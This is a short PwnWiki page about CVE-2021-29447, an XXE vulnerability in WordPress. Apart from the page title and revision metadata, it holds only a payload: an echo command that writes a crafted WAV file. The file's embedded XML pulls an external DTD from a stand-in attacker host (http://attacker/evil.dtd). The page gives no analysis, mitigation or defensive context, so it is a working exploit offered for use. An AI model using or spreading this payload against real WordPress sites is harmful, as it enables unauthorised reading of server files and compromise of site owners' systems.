CVE-2021-29447 Wordpress XXE漏洞

From PwnWiki
Revision as of 16:54, 6 May 2021 by Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Payload

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-29447_Wordpress_XXE漏洞&oldid=2681"